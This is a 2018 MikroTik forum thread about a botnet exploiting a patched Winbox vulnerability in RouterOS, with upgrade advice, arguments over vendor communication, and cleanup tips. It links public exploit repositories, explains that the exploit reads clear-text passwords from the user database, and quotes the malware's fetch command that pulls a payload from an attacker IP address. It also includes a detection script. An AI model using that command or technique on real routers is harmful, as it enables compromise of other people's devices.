Winbox vulnerability: please upgrade

Thu Aug 02, 2018 1:34 pm

It has come to our attention that a rogue botnet is currently using the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings. Delete SOCKS configurations, and any unknown scripts
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

[UPDATED with specific versions]: Full details on what to do and what is affected: https://blog.mikrotik.com/security/winb ... ility.html

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.

Samot · Thu Aug 02, 2018 1:41 pm

@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.

Thu Aug 02, 2018 1:49 pm

@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.

it's already in the blog, because it is the same vulnerability.

Samot · Thu Aug 02, 2018 1:51 pm

That's what I figured.

dada · Thu Aug 02, 2018 3:11 pm

Hi Normis,

what you wrote above may look for someone that 6.40.8 (bugfix) is not secure too. I would like you mention that this bugfix release is secure too (blog needs correction too but it mention that 6.40.8 is OK at least).

tippenring · Thu Aug 02, 2018 4:42 pm

@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.

I'm with @Samot. If it's worth a forum post, it's worth posting a similar update to the blog. As soon as the blog was announced I added it to my important RSS feeds so I get fast notifications.
Maybe not a lot of people are monitoring the blog posts yet, but I think to err on the side of a little extra communication is warranted.

On forum posts if the subject line doesn't interest me, I would never read it.

Thu Aug 02, 2018 4:49 pm

On forum posts if the subject line doesn't interest me, I would never read it.

It is like: I do not like this song as I have never listened to it earlier and the title is boring me.

acruhl · Thu Aug 02, 2018 5:26 pm

I got a news article about this today through my Google feed. I immediately realized that this is a problem that has been fixed a while.

But I agree a short new blog post pointing to the earlier post would reduce confusion. People would be coming here looking for new information.

I hope it's clear to people that ports on public facing networks should be blocked using the firewall... Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...

tippenring · Thu Aug 02, 2018 6:40 pm

On forum posts if the subject line doesn't interest me, I would never read it.
It is like: I do not like this song as I have never listened to it earlier and the title is boring me.

lol. Nice try, but the analogy is weak. A song can be in the background and doesn't consume any time.

This forum is very busy. I do not have time to read all the posts. I am notified of new/updated forum posts via email. A good subject line will get me spend the time to read the post.

Incidentally, I *really* wish the forum email notifications included the content of the post.

jbird · Thu Aug 02, 2018 9:25 pm

Hi Normis,

what you wrote above may look for someone that 6.40.8 (bugfix) is not secure too. I would like you mention that this bugfix release is secure too (blog needs correction too but it mention that 6.40.8 is OK at least).

So, is 6.40.8 secured against this vulnerability or is it not?

abjornson · Thu Aug 02, 2018 9:31 pm

I'd also really like confirmation on whether the latest bugfix ( 6.40.8 ) release has been patched for this vulnerability.

Kindis · Thu Aug 02, 2018 9:56 pm

According to changelog it is fixed

What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;

ludvik · Thu Aug 02, 2018 10:28 pm

This vulnerablity is from 6.28. I try it:
https://github.com/BigNerd95/WinboxExploit
https://github.com/BasuCert/WinboxPoC

garethiowc · Fri Aug 03, 2018 12:15 am

this has caused me a nightmare

Lesson learnt that's for sure.

i'm so glad the script didn't reset any routers but still it's going to take a few days to sort them all out

kobuki · Fri Aug 03, 2018 12:58 am

This vulnerablity is from 6.28. I try it:
https://github.com/BigNerd95/WinboxExploit
https://github.com/BasuCert/WinboxPoC

On the first link WinboxExploit.py reveals that the admin password is stored in the clear in the device. It simply requests the userdb and prints stuff found at offset 55. Mind == blown.

Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.

Janevski · Fri Aug 03, 2018 3:25 am

Hopefully, by using such zero day, somebody hacks, enters into MikroTik HQ, steals, borrows, forks, acquires by using magnets, liberates the source code and makes GNU/RouterOS, so no such zero day happens ever again.

LeftyTs · Fri Aug 03, 2018 3:47 am

Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...

Even that could get hacked. It is exposed to annoying dictionary attacks all the time. Now days, best practice is to simply work through carefully secured and encrypted VPNs and nothing else open to the public.

vecernik87 · Fri Aug 03, 2018 6:59 am

@Normis: Thank you for the email. I know I was pain in the a** by repeatedly pointing it out, but I believe it was simply missed. It is a bit shame it took so long but I really appreciate this step in order to help RouterOS users secure their devices.
Please be assured that I never wanted to show any hostility against Mikrotik. All my posts were in pursuit of safety for other users, which will in the end help Mikrotik by improving relationship and trust with customers.

Fri Aug 03, 2018 8:54 am

Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.

From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.

Fri Aug 03, 2018 9:11 am

Normis ...
It seems to be a fight with windmills ... this is era when most people read JUST THE TOPIC and do not read more than one sentence of news and most of them do not even want to think what they are reading about. Topic is all information they want to know.

SilverNodashi · Fri Aug 03, 2018 9:21 am

According to changelog it is fixed

What's new in 6.40.8 (2018-Apr-23 11:34):

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;

So why would they post this again if it was fixed in April?

Fri Aug 03, 2018 9:30 am

To not be blamed that they do nothing !!!!

Have you read carefully all recent posts on forum about this "problem"?

Mikrotik is almost blamed for not upgraded 70k+ routers in Brazil, that people are not informed and so on ...

PS.

Windmills +1

msatter · Fri Aug 03, 2018 9:59 am

In our country we have a lot of windmills and we don't fight them, we use them. However we have a "Bierkaai" and yes that has to do with beer...and not weed despite it arrives in the same city.

De Bierkaai was the quay in Amsterdam where the barrels of beer arrived and the porters worked who loaded and unloaded the heavy barrels with beer.
The residents of this part of Amsterdam were known as invincible fighters and seeking a fight with them, was one you absolutely would loose.

So whenever you come to Amsterdam to smoke, illegally produced weed then, ask about the "Bierkaai". It was a part of the "Oudezijds Voorburgwal", located near the "Oude Kerk".

I wrote on many occasions that security has improved in last time. And this security 'problem' was more than a wakeup call and it will have carry a lot of fallout and we are only at the beginning of that. I wrote about what cloud have/should have done in the past months to inform and warn owners of Mikrotik devices.

Others and I have written a lot of suggestions in the past in different topics and please do something with those suggestions and make a plan so that this will not happen again.
It might take drastic measures which are not seen before but having these kinds of problems can even kill a company, if trust in that company collapses.

Fri Aug 03, 2018 10:21 am

As Oude Kirk is about 5 min. walking from Central Station then most people start and end visiting Amsterdam do not crossing Damstraat and they are missing eg. Rembrandt's Museum. Not even trying to visit or just find any windmill Nederlands are famous for

CZFan · Fri Aug 03, 2018 10:49 am

I received an e-mail this morning from one of our Mikrotik distributors here in South Africa, and note this is not the first one I have received from them re Mikrotik Notice.

So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist

MTNotice.JPG

kobuki · Fri Aug 03, 2018 12:55 pm

Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.

Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I recon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe. That aside, your quick reaction and fix is exemplary, so we should thank you for that. But please allow some of us to be a little skeptical after the fact that in 2018 you still stored (past tense) something as sensitive in the device as a password, in clear text. Anyway, hoping for the best and life goes on.

Fri Aug 03, 2018 2:06 pm

...Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I recon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe....

Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.

Should Mikrotik call/inform each user/owner and "persude" to upgrade? What if user says NO? What if admins in DC ignore such info?

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

If car company makes mistake in a car it calls people to service point but someone ignoring this call will be using bad car forever.
If food company needs to collect some "bad" food from market, in spite of problems in production process, it is imposible to persudae anyone to return it. All owners could be asked to return but nothing more.

It all depends on users/owners will !!!

vecernik87 · Fri Aug 03, 2018 2:13 pm

So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist

The email was released AFTER the news about botnet. It again happened after negative publicity hit the media, despite the fact I was many times asking to send the email earlier.
It was same mistake as previous email, which was sent on March 2018 after whole world was floded with news about "vpnfilter" malware (which was using March 2017 webserver vulnerability)

I really want Mikrotik to succeed and I promote them around my business as I can, and if would be much easier, if emails come as preemptive actions instead of reaction to negative publicity in news.
I know they don't have to, but imagine how much positive publicity Mikrotik can get, if they proactively warn users after the vulnerability is found and fixed and before it gets massively misused. My personal opinion - it would be like a dream! And cost of mass email is not that high...

I definitely disagree with idea from this topic about home-calling routers, pushing users to update etc.. That is not necessary and create more issues than it solves.

msatter · Fri Aug 03, 2018 2:21 pm

AVM (Fritz!box) does it because they are in the SOHO area in which Mikrotik also more and more operative.

You can switch of automatic updates and be warned and even tell not to check. TR069 can also be disabled so you are the boss.

AVM sells routers in Germany, Poland, Netherlands, Belgium, Austria and Italy and many other countries. The premium ISP Xs4all in the Netherlands use Fritz!boxes as their customer device.

I replaced my Fritz!box because AVM is not anymore what it was in the past. I replaced it by Mikrotik but the Fritz!box is still doing WiFi, DECT, house automation.

I can pick up my phone and press a few butons to check if there is a update. If an update is waiting to be installed I get beep and a red light blinking on the DECT phone. I can upgrade by selecting the update and it will update the Fritz!box.

And yes, I have forbid the Fritz!box to check through the DNS server. No firewall rules needed.

kobuki · Fri Aug 03, 2018 2:41 pm

Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.

Should Mikrotik call/inform each user/owner and "persude" to upgrade? What if user says NO? What if admins in DC ignore such info?

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

If car company makes mistake in a car it calls people to service point but someone ignoring this call will be using bad car forever.
If food company needs to collect some "bad" food from market, in spite of problems in production process, it is imposible to persudae anyone to return it. All owners could be asked to return but nothing more.

It all depends on users/owners will !!!

No arguments against the importance of applying updates in time by owners whatsoever. But you're aware that car makers get sued for dysfunctional parts or functional parts having design mistakes, right? That's because they didn't do everything in their power and ability to prevent problems leading to (fatal) accidents. It's exactly because you can't tell users what to do why you need to do everything you can to prevent disasters such as this. If the passwords were stored as (strong) hashes, the security hole didn't exist to begin with. Well, being able to get the user db is still a problem, but by far not as serious. The only thing I'm pissed about is the pw storage which has been allegedly fixed along with the Winbox sechole (and very quickly, at that). And don't get me wrong, I will continue to use and advocate MT devices, they're great but these small mishaps are the ones that usually ruin the reputation of any thriving company.

Fri Aug 03, 2018 2:54 pm

Once again:

I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.

OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.

The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.

CZFan · Fri Aug 03, 2018 3:53 pm

Once again:
I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.

The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.

Agree, and to mention it again, security will always be a "Reactive" problem

msatter · Fri Aug 03, 2018 4:57 pm

@CZFan, last you wrote that also but that thread was closed before I could read it.

Security is for 95% reacting to a attack the remaining 5% can cause more damage than the 95%.

I mentioned AVM, they had not long ago big hole in their VOIP system. It was patched and rolled out within a few weeks to all AVM routers. Mikrotik had months time.

https://www.cvedetails.com/cve/CVE-2015-7242/

excession · Fri Aug 03, 2018 5:54 pm

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.

What sorts of changes are being made?
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.

msatter · Fri Aug 03, 2018 6:01 pm

A start can be found here: viewtopic.php?f=2&t=137375

Also check the blog for more information.

kobuki · Fri Aug 03, 2018 6:03 pm

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
What sorts of changes are being made?
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.

What potentially of interest is:
- change/activation of the socks service
- disabling "drop" rules in the fw (seen myself) or ones added allowing unconditional access (seen reported by others)
- unneeded/bogus/suspicious/deleted fw entries (reported by others)
- added suspicious scripts to system/scripts and associated scheduler entries
- deleted existing scripts (reported by others)

There might be others, too, do a search in the forums. I have regular backups using compact export .rsc files so I was able to do a diff and see all changes which I mentioned above, on a particular device.

Tonda · Fri Aug 03, 2018 7:49 pm

So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?

kobuki · Fri Aug 03, 2018 8:02 pm

So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?

Have you read the first post of this thread?

EDIT: hmm, now that you asked, and reading the blog post again, it's really not very apparent which version pertains to which release branch at a single glance. Both bugfix and recent stable releases are linear without additional marking. Although if you're fixated your updates on either of them you should be able to determine. 6.40.8 is the latest bugfix one, so it should be OK.

DummyPLUG · Fri Aug 03, 2018 8:39 pm

From https://wiki.mikrotik.com/wiki/Manual:IP/Services it said MAC winbox using 20561/udp, is that it is better to block this port too?

msatter · Fri Aug 03, 2018 9:09 pm

The MAC addressing is used inside the network (L2) and sometimes on the first hop to your ISP router/switch. MAC can't be blocked as discussed in other threads.

viewtopic.php?f=21&t=133533&p=656925&hi ... 51#p656925

Pea · Fri Aug 03, 2018 11:20 pm

So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?

Bugfix release tree
Release 6.40.8 2018-04-24
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
https://mikrotik.com/download/changelog ... lease-tree

Moky · Fri Aug 03, 2018 11:31 pm

MikroTik is at the top of the news today - but, unfortunately, not in a good connotation.

It bothers me the most that they put it in the same basket as the cheap Chinese networking manufacturers and vulnerable IoT stuff.

There is no CVE number related to this vulnerability - why? The people are confused with what is this "new" vulnerability because there is no CVE and there is no identifier that will tell them that this is the same vulnerability.
This is a standard way of doing this stuff - you make a CVE and reference it in your announcements and advisories, as well as change history in RouterOS.

You can't blame all of this on users, there are things that can be fixed also from the MikroTik side.
I work in a big enterprise with large amount of products and vendors, and I do follow only security mailing lists and advisories - because of the old one: "if something works well, don't touch it" (I patch and upgrade it only when there is a security vulnerability or a functional issue). Another reason is that I don't have enough time to follow all of the different announcements.

I have a few suggestions:

For every vulnerability (even the smallest one) create a CVE number with dates, short description etc.
If the vulnerability is critical, create an IPS/IDS (Snort or similar) rules so the people can protect themselves before they can upgrade all of the infrastructure.
Create Security sub-forum where people can ask related questions and take advices (I've seen a lot of MikroTik Wireless and Routing gurus that don't have enough security awareness).
Create Security mailing list (the Blog you created is a nice step forward, but this is useful for "post event summary" and maybe not exactly for urgent security advisories).
Publish some security bug-bounty program and rewards - this way the chances are bigger that the security vulnerabilities will be reported to you and not sold on the DarkWeb or used by bad guys.

I really like MikroTik products and community - it really hurts when things like this happen (not to mention mocking that I get from our Cisco guys).

Kind regards,
Moky

gotsprings · Sat Aug 04, 2018 3:48 am

I made this to look for the common stuff. (Copy and paste into terminal.)


:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
:if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
:if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
:if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}

Open you log and look at the results. If you have a result with "!" you might have a problem.

dsich · Sat Aug 04, 2018 10:13 am

i have found one of my customers router infected. How can i clean it remote?
I have changed the socks port to default and diabled. I have not found another user like admin. The passwort is changed. But in the files are the mikrotik.php. If i delete this, after 5 seconds its new.
Firmware now is 6.42.6. Its a HaP Lite. Winbox in Services is diabled, only Web over Port 80 is active and blocked from outside on my core router.

Thanks

CZFan · Sat Aug 04, 2018 10:30 am

This morning I received a mail directly from Mikrotik re vulnerability

MTNotice.JPG

JimmyNyholm · Sat Aug 04, 2018 11:17 am

I got the same Mail two days ago so perhaps they're having problem with the mail systems ?

gotsprings · Sat Aug 04, 2018 1:33 pm

i have found one of my customers router infected. How can i clean it remote?
I have changed the socks port to default and diabled. I have not found another user like admin. The passwort is changed. But in the files are the mikrotik.php. If i delete this, after 5 seconds its new.
Firmware now is 6.42.6. Its a HaP Lite. Winbox in Services is diabled, only Web over Port 80 is active and blocked from outside on my core router.

Thanks

Look in scripts and schedule.

dsich · Sat Aug 04, 2018 2:48 pm

Thats it! THX!

In scripts are

/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http

R1CH · Sat Aug 04, 2018 3:27 pm

It's disappointing that both the httpd vulnerability and now the winbox vulnerability required mass exploitation before Mikrotik sent an email. Why not send these emails on day 1?

43north · Sun Aug 05, 2018 9:00 am

@normis we were hit with this on July 22nd. I was on a vulnerable firmware and the only service we had open was winbox but with no filtering and on the default port

.

I caught it in less than 24 hours because of the log file.

I had a backup config from a few days prior to the attack which I restored and then immediately upgraded to the latest current firmware release and routerboard firmware. Obviously reloading my prior backup undid all the changes that I noticed the bot put into my router (socks, script, scheduler, FW allow rule) etc. Can you confirm also that upgrading to the newest firmware actually cleans the malware?

Since then I have changed default port, only allowed IP SERVICES on local network, and setup mangle rules for anything that scans my current winbox port and adds it to a blacklist drop rule.

Who is online